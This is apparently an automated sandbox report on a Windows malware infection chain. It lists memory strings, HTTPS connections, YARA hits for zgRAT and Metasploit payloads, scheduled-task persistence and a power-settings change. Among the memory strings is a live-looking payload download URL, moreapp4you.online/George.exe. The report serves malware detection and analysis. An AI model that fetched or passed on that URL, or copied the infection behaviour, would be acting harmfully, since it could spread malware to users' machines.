Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000001D.00000002.4225131026.0000018F5C268000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4221491538.0000018F5B4E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214723975.0000018F5C266000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000001D.00000002.4221491538.0000018F5B509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.liveH
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfSt
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfh
Source: svchost.exe, 0000001D.00000002.4221491538.0000018F5B509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://logive.com/
Source: ama.exe, 00000004.00000002.2393678580.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moreapp4you.online
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moreapp4you.online/George.exe
Source: axplong.exe, 00000002.00000002.4499679866.0000000005B68000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899550497.0000000005B67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/
Source: axplong.exe, 00000002.00000002.4492544980.000000000149D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4492544980.000000000149B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa
Source: qmgr.db.28.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4216939311.0000018F5BD46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215441329.0000018F5BD42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4215039299.0000018F5BD41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000003.2899380423.0000000005B92000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4499774941.0000000005B98000.00000004.00000020.00020000.00000000.sdmp, legs.exe.2.dr	String found in binary or memory: https://www.entrust.net/rpa0

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52914
Source: unknown	Network traffic detected: HTTP traffic on port 52926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53130
Source: unknown	Network traffic detected: HTTP traffic on port 52897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 52893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52923
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 52923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52926
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52920
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 52894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52935
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52893
Source: unknown	Network traffic detected: HTTP traffic on port 52920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52894
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52897
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 52904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 52908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 58.65.168.132:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.67.42.145:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.31.196.208:443 -> 192.168.2.5:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.5:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.5.27.203:443 -> 192.168.2.5:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.144.241:443 -> 192.168.2.5:52894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:52893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52904 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52923 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52926 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52929 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:52935 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe

Code function: 8_2_005DDDE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_005DDDE0

Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe

Code function: 8_2_005DDDE0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

8_2_005DDDE0

Source: RegAsm.exe, 00000017.00000002.2259714119.0000000003318000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_2fc9b5c9-d

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.legs.exe.cc0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000024.00000003.2381126293.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000024.00000003.2493890877.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000024.00000003.2443773184.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

PE file contains section with special chars

Source: hsRju5CPK2.exe	Static PE information: section name:
Source: hsRju5CPK2.exe	Static PE information: section name: .idata
Source: hsRju5CPK2.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&
Source: 6.exe.4.dr	Static PE information: section name: .vmp-~&

Uses powercfg.exe to modify the power settings

Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Code function: 9_2_000ECA9A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		9_2_000ECA9A
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Code function: 11_2_00BACA9A NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		11_2_00BACA9A

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	File created: C:\Windows\Tasks\Hkbsse.job
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00CFE410	2_2_00CFE410
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00CF4CD0	2_2_00CF4CD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D33048	2_2_00D33048
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D27D63	2_2_00D27D63
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00CF4AD0	2_2_00CF4AD0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D36EE9	2_2_00D36EE9
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D3763B	2_2_00D3763B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D32BB0	2_2_00D32BB0
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D3775B	2_2_00D3775B
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Code function: 2_2_00D38700	2_2_00D38700
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_025BDC74	4_2_025BDC74
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069136F0	4_2_069136F0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06916630	4_2_06916630
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069127C8	4_2_069127C8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06914520	4_2_06914520
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06915098	4_2_06915098
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069171E0	4_2_069171E0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06915ED8	4_2_06915ED8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06913EC8	4_2_06913EC8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06917DF0	4_2_06917DF0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06917988	4_2_06917988
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069149A0	4_2_069149A0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069136E0	4_2_069136E0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069127B7	4_2_069127B7
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06919080	4_2_06919080
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06910016	4_2_06910016
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06910006	4_2_06910006
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06910040	4_2_06910040
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_069171D0	4_2_069171D0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06913EB9	4_2_06913EB9
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06912E20	4_2_06912E20
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06918A88	4_2_06918A88
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06918A78	4_2_06918A78
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06914993	4_2_06914993
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06910958	4_2_06910958
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06910948	4_2_06910948
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_06917978	4_2_06917978
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07773C40	4_2_07773C40
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07777410	4_2_07777410
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07777C80	4_2_07777C80
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07775338	4_2_07775338
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07776278	4_2_07776278
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_0777C2E8	4_2_0777C2E8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_077749B0	4_2_077749B0
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07778841	4_2_07778841
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_077768B8	4_2_077768B8
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_0777057B	4_2_0777057B
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07770588	4_2_07770588
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07777C71	4_2_07777C71
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07776268	4_2_07776268
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07773248	4_2_07773248
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_077749A1	4_2_077749A1
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Code function: 4_2_07772818	4_2_07772818
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009F80F2	5_2_009F80F2
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009F0484	5_2_009F0484
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_00A015B2	5_2_00A015B2
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009F3560	5_2_009F3560
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009FC84A	5_2_009FC84A
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Code function: 5_2_009FFC15	5_2_009FFC15
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0285DC74	7_2_0285DC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_05008FF8	7_2_05008FF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_05006948	7_2_05006948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_05000016	7_2_05000016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_05000040	7_2_05000040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_05008FE8	7_2_05008FE8
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B106C	8_2_005B106C
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D601B	8_2_005D601B
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D6008	8_2_005D6008
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005C0020	8_2_005C0020
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005E7170	8_2_005E7170
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D1190	8_2_005D1190
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D01B6	8_2_005D01B6
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B8250	8_2_005B8250
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005D63B2	8_2_005D63B2
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005B4440	8_2_005B4440
Source: C:\Users\user\AppData\Local\Temp\1000047001\lummac2.exe	Code function: 8_2_005CC48E	8_2_005CC48E
